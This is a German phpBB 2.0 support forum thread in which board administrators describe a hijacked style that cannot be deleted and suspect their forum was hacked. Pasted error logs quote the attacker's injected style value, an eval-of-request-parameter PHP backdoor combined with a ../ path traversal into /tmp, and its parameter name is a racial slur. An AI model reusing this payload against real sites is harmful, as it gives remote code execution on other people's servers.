Hallo zusammen,
sind gerade aus dem osterurlaub wiedergekommen und was muß ich sehen, in unserem Forum herrschen ganz neue Farben: http://www.stray-cats.de/forum Als ich dann im Adminbereich geschaut habe, gibt es ein unvollständiges Style mit namen F1 Black und dahinter steht : stahnt dann ein völlig korupter Zahlencode, denn ich jetzt leider nicht genau aufschreiben kann. Als ich nun versuchte das Style zu löschen, klappt es nicht, es wird immer wieder nach löschen ja/nein gefragt, egal wieoft ich auf ja klicke. Wie bekomme ich diese Mistding wieder weg und vorallem, wie ändere ich wieder die ursprünglichen farben ( Hintegrund, linien usw. )
Bei uns war immer nur ein Style instaliert SubSilver und so sollte es auch sein !
Wer weiß Hilfe ? IUnd wie kommt so etwas zustande, von alleine wohl nicht, oder ?
Gruß
Stephan
Style läßt sich nicht löschen, Forum gehackt ?
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
hi!
mir ist soeben was ähnliches passiert, wenn nicht das gleiche!
Von einen moment auf den anderen war das styling komplett verstellt, bzw. auf standard subSilver zurückgestellt. normalerweise hab ich "bblack"..
als ich im admin bereich das design wieder ändern wollte, kamen dann nur noch folgende fehlermeldungen:
und ich komm jetzt nicht mal mehr rein!
HILFE! wasn da los?
mir ist soeben was ähnliches passiert, wenn nicht das gleiche!
Von einen moment auf den anderen war das styling komplett verstellt, bzw. auf standard subSilver zurückgestellt. normalerweise hab ich "bblack"..
als ich im admin bereich das design wieder ändern wollte, kamen dann nur noch folgende fehlermeldungen:
Code: Alles auswählen
SecureSSI: Das Script (/usr/export/www/vhosts/funnetwork/hosting/xxx-mein-username-xxx/phpBB/index.php) hat versucht ausserhalb von ihrem Userverzeichniss auf die Datei ./templates/aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp/aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp.cfg zuzugreifen.
Dies ist nicht erlaubt!
phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
DEBUG MODE
Line : 335
File : /usr/export/www/vhosts/funnetwork/hosting/xxx-mein-username-xxx/phpBB/includes/functions.php
HILFE! wasn da los?
.... Telefon-Support - Schnelle Hilfe bei Hackangriffen, Modeinbau, Templateanpassung, Grafikerst., uvm.
.... Es gibt keine Probleme .... Nur neue Chancen
.... Ihr wollt ein einmaliges Template? - Prof. Templateerstellung und phpBB-Anpassungen
.... Es gibt keine Probleme .... Nur neue Chancen
.... Ihr wollt ein einmaliges Template? - Prof. Templateerstellung und phpBB-Anpassungen
hat bei mir nichts gebracht die cfg datei neu upzuloaden?!
gibt's irgendeinen andere möglichkeit?!

bzw. hat sich nur folgendes verändert:
gibt's irgendeinen andere möglichkeit?!

bzw. hat sich nur folgendes verändert:
Code: Alles auswählen
SecureSSI: Das Script (/usr/export/www/vhosts/funnetwork/hosting/xxx-ICH-xxx/phpBB/index.php) hat versucht ausserhalb von ihrem Userverzeichniss auf die Datei ./templates/aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp/aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp.cfg zuzugreifen.
Dies ist nicht erlaubt!
phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
DEBUG MODE
Line : 327
File : /usr/export/www/vhosts/funnetwork/hosting/xxx-ICH-xxx/phpBB/includes/functions.php